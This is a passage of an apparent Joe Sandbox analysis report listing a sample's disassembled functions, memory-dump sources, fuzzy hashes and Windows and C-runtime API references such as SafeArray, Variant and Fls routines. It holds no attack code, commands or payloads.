                                                          • Instruction ID: f215af1befade6d0cdd8cfedffa47431123d22006099f17200e7a5bebbcdae2e
                                                          • Opcode Fuzzy Hash: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
                                                          • Instruction Fuzzy Hash: 2A21E7367165528BD705CE2EC8808A6B7A7EF9D31472981F9E918CF383CA70E916C7D0
                                                          Function 6CF58B30 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
                                                          • Instruction ID: 31a159e973f1b43136651bf6110fd3977094565f3028d8963328cd663c7c3d00
                                                          • Opcode Fuzzy Hash: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
                                                          • Instruction Fuzzy Hash: 40218E757056874BE715CF2EC84059BBBA3EFD9300B1980B7E858DB242C674E866CBC0
                                                          Function 6CF5A7E0 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
                                                          • Instruction ID: 0ac58bcee2463e339e37f9991c84128d5df6d46f5a2dc49a20d99ea478242a45
                                                          • Opcode Fuzzy Hash: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
                                                          • Instruction Fuzzy Hash: 46110631A056924BD7018E2DC8406D6BBA7AFDE710B0A81EBE954DF217C774982BC7E0
                                                          Function 6CF5C7B0 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
                                                          • Instruction ID: 4c07fc3759204d34ce9c7d2cabc01cb48eda6337f371b9cf523790f5fcc1a282
                                                          • Opcode Fuzzy Hash: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
                                                          • Instruction Fuzzy Hash: 4411E93570AA420BF304CE2EE840483B793AFDD3147AA85AEA455DF546C771E426C681
                                                          Function 062E3283 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94ac2b973e76de05d88d6e02af1ede85b788e75614cfef4c5b9560aa25af236c
                                                          • Instruction ID: 8dde010d86adf2f2fa2f0413f6ea522ef107c0843a01dfbe9b70219fc6802fc3
                                                          • Opcode Fuzzy Hash: 94ac2b973e76de05d88d6e02af1ede85b788e75614cfef4c5b9560aa25af236c
                                                          • Instruction Fuzzy Hash: 8421ACB5D012189FDB10CF99D584ADEFBF0EB49320F24902AE818B7310C735A945CFA4
                                                          Function 062E3288 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 68de1683153f8a7b98bdd5b4ce48a9cb37ca4d7275ee1c38c1f4191058ae4211
                                                          • Instruction ID: 93d765d55eef7c1f12e8bbf18a46a68f0d97720f1b7cf45c5767d6793575469c
                                                          • Opcode Fuzzy Hash: 68de1683153f8a7b98bdd5b4ce48a9cb37ca4d7275ee1c38c1f4191058ae4211
                                                          • Instruction Fuzzy Hash: 3221AAB5D012189FCB10CFA9D584AEEFBF0AB49320F24902AE818B7310C734A945CFA4
                                                          Function 6CFB84B0 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72e8c7eccc0d9499a582c26eca03c4cb3b6881d1b96a08885e262fac4ba79371
                                                          • Instruction ID: 426114b6a4cf7954fa3a2afd4668fa31227442e4424991a2bd6e0be26ca7edb5
                                                          • Opcode Fuzzy Hash: 72e8c7eccc0d9499a582c26eca03c4cb3b6881d1b96a08885e262fac4ba79371
                                                          • Instruction Fuzzy Hash: 5F1152B6904609EFC714CF59D841799FBF4FB44724F10863EE81993B80D735A900CB90
                                                          Function 6CFC6FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • operator+.LIBCMT ref: 6CFC6FCC
                                                            • Part of subcall function 6CFC4147: DName::DName.LIBCMT ref: 6CFC415A
                                                            • Part of subcall function 6CFC4147: DName::operator+.LIBCMT ref: 6CFC4161
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: NameName::Name::operator+operator+
                                                          • String ID:
                                                          • API String ID: 2937105810-0
                                                          • Opcode ID: fb4118ef44b5868dab53d71686552df3930f2617d45d737a4f93a83a6519a430
                                                          • Instruction ID: 23189715f2fb15d93be66c41ad3d5937e6bc48c8e231ca1ca9fb69d52da6fa13
                                                          • Opcode Fuzzy Hash: fb4118ef44b5868dab53d71686552df3930f2617d45d737a4f93a83a6519a430
                                                          • Instruction Fuzzy Hash: 9DD13DB1B0020AAFDF10DFA8C881AEFBBB8EF04344F10405AE515E7690DB759A49CB52
                                                          Function 6CFBEC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBECA5
                                                          • __mtterm.LIBCMT ref: 6CFBECB1
                                                            • Part of subcall function 6CFBE97C: DecodePointer.KERNEL32(00000012,6CFBA397,6CFBA37D,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBE98D
                                                            • Part of subcall function 6CFBE97C: TlsFree.KERNEL32(00000015,6CFBA397,6CFBA37D,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBE9A7
                                                            • Part of subcall function 6CFBE97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6CFBA397,6CFBA37D,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFC2325
                                                            • Part of subcall function 6CFBE97C: DeleteCriticalSection.KERNEL32(00000015,?,?,6CFBA397,6CFBA37D,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFC234F
                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CFBECC7
                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CFBECD4
                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CFBECE1
                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CFBECEE
                                                          • TlsAlloc.KERNEL32(?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBED3E
                                                          • TlsSetValue.KERNEL32(00000000,?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBED59
                                                          • __init_pointers.LIBCMT ref: 6CFBED63
                                                          • EncodePointer.KERNEL32(?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBED74
                                                          • EncodePointer.KERNEL32(?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBED81
                                                          • EncodePointer.KERNEL32(?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBED8E
                                                          • EncodePointer.KERNEL32(?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBED9B
                                                          • DecodePointer.KERNEL32(Function_0006EB00,?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBEDBC
                                                          • __calloc_crt.LIBCMT ref: 6CFBEDD1
                                                          • DecodePointer.KERNEL32(00000000,?,?,6CFBA2D4,6CFE95C0,00000008,6CFBA468,?,?,?,6CFE95E0,0000000C,6CFBA523,?), ref: 6CFBEDEB
                                                          • GetCurrentThreadId.KERNEL32 ref: 6CFBEDFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                          • API String ID: 1868149495-3819984048
                                                          • Opcode ID: e8f38ef4817263843bb0d79084bb93fa74ba3371f555376316a6877bde98fb6f
                                                          • Instruction ID: caf2615389cff671363866fc8846fbe51d579376860470f8b7e161152d7b5034
                                                          • Opcode Fuzzy Hash: e8f38ef4817263843bb0d79084bb93fa74ba3371f555376316a6877bde98fb6f
                                                          • Instruction Fuzzy Hash: D831A531E203269BDFA0BF76AC08B553FB8FB06B94725091AE470A3690DBB19404DFD1
                                                          Function 6CF60EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Xinvalid_argumentstd::_
                                                          • String ID: invalid string position$string too long
                                                          • API String ID: 1771113911-4289949731
                                                          • Opcode ID: 883b05c949972cf102a95e170c1e134f57f5baa997efba8bd2282b61d8cc8443
                                                          • Instruction ID: 545c9ea1a07e5c275f6ccd4489804410c57ed5caf0a39cec28860441ca4e9a21
                                                          • Opcode Fuzzy Hash: 883b05c949972cf102a95e170c1e134f57f5baa997efba8bd2282b61d8cc8443
                                                          • Instruction Fuzzy Hash: 28B16B71700144ABDB28CE1ECD90A9B73BAEB85344728891DF892CBF81C774ED45CBA1
                                                          Function 6CFC7FC4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6CFC7FFF
                                                          • DName::operator=.LIBCMT ref: 6CFC8013
                                                          • DName::operator+=.LIBCMT ref: 6CFC8021
                                                          • UnDecorator::getPtrRefType.LIBCMT ref: 6CFC804D
                                                          • UnDecorator::getDataIndirectType.LIBCMT ref: 6CFC80CA
                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6CFC80D3
                                                          • operator+.LIBCMT ref: 6CFC8166
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                          • String ID: std::nullptr_t$volatile
                                                          • API String ID: 2203807771-3726895890
                                                          • Opcode ID: 2cff6acc6b7f8aae99336fb59300c6d9a98ee79223aacb97098139e4a5cf7bd9
                                                          • Instruction ID: f7f85dc8b069aa5e468f58ff7f33d1b21731009752bb2321c2267eefc62d5c69
                                                          • Opcode Fuzzy Hash: 2cff6acc6b7f8aae99336fb59300c6d9a98ee79223aacb97098139e4a5cf7bd9
                                                          • Instruction Fuzzy Hash: 6D41E472B4810BBFCB109F54C840AEFBBB8FB02745F218067E96457A51D7329A45CB52
                                                          Function 6CF75140 Relevance: 21.2, APIs: 14, Instructions: 203COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF75177
                                                            • Part of subcall function 6CF82820: _malloc.LIBCMT ref: 6CF82871
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CF751B9
                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CF751D5
                                                          • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CF751E5
                                                          • _memmove.LIBCMT ref: 6CF751FF
                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF75208
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF7522C
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF75263
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7526C
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CF752AD
                                                          • VariantClear.OLEAUT32(?), ref: 6CF752B6
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CF752D2
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF7534E
                                                          • VariantClear.OLEAUT32(?), ref: 6CF75358
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
                                                          • String ID:
                                                          • API String ID: 452649785-0
                                                          • Opcode ID: dae1664176dcff3c97ded670f974c1b2caf2d0b4e0ba6942bf11f35a0542f0e5
                                                          • Instruction ID: 84a776d42024b7762e460df9327fe43967d64bfc06d533086a7bc8256ed9de4d
                                                          • Opcode Fuzzy Hash: dae1664176dcff3c97ded670f974c1b2caf2d0b4e0ba6942bf11f35a0542f0e5
                                                          • Instruction Fuzzy Hash: 177129B1A1021AEFDB01DFA5D884BAFBBB9FF49304F10811AE915E7650D774E905CBA0
                                                          Function 6CF6F95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF6FA0F
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF6FA22
                                                          • SafeArrayGetElement.OLEAUT32 ref: 6CF6FA5A
                                                            • Part of subcall function 6CF73A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF73B71
                                                            • Part of subcall function 6CF73A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF73B83
                                                            • Part of subcall function 6CF769C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF76A08
                                                            • Part of subcall function 6CF769C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF76A15
                                                            • Part of subcall function 6CF769C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF76A41
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                            • Part of subcall function 6CF6DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF6DFF6
                                                            • Part of subcall function 6CF6DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF6E003
                                                            • Part of subcall function 6CF6DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF6E02F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                          • String ID: RS7m$RS{m
                                                          • API String ID: 959723449-144615663
                                                          • Opcode ID: 39bbdbbab3ac90d1d3d4e3e6a63f8884fbde095131b74e729cb6b5ddcee34479
                                                          • Instruction ID: 38bd11ae3d3fa97584c5070b3a30f0f1562046c64461e7f2f04764562823375e
                                                          • Opcode Fuzzy Hash: 39bbdbbab3ac90d1d3d4e3e6a63f8884fbde095131b74e729cb6b5ddcee34479
                                                          • Instruction Fuzzy Hash: FFC16D70A012049FDB54CF69CD84FADB7B9AF85308F204199E905EBB86DB76ED44CB60
                                                          Function 6CF73690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
